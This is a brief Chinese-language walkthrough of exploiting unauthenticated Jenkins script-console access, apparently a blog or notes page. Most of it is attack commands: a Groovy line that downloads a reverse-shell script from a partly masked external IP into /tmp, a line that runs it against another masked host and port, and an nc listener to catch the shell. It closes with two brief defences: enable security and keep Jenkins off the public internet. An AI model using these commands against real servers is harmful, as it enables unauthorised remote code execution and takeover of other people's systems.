Jenkins未授权访问脚本执行漏洞

Jenkins未授权访问脚本执行漏洞

步骤

首先找一个站点挂上一个反弹shell脚本，然后在脚本执行框里执行脚本进行下载到tmp目录：

println "wget http://47.95.XXX.XXX/xxx.py -P /tmp/".execute().text

执行成功下面Result并没有反馈

然后我们执行命令允许反弹shell脚本

println "python /tmp/xxx.py 140.143.xxx.xxx 1234".execute().text

 

此时我们在140.143.xxx.xxx主机上使用nc监听1234端口

nc -l -p 1234

 

ifconfig 查看ip

查看一下当前用户 w命令

防御措施：

1.对Jenkins访问进行密码加密

Manage Jenkins -> Configure System -> Enable Security

 

2.不暴露在公网上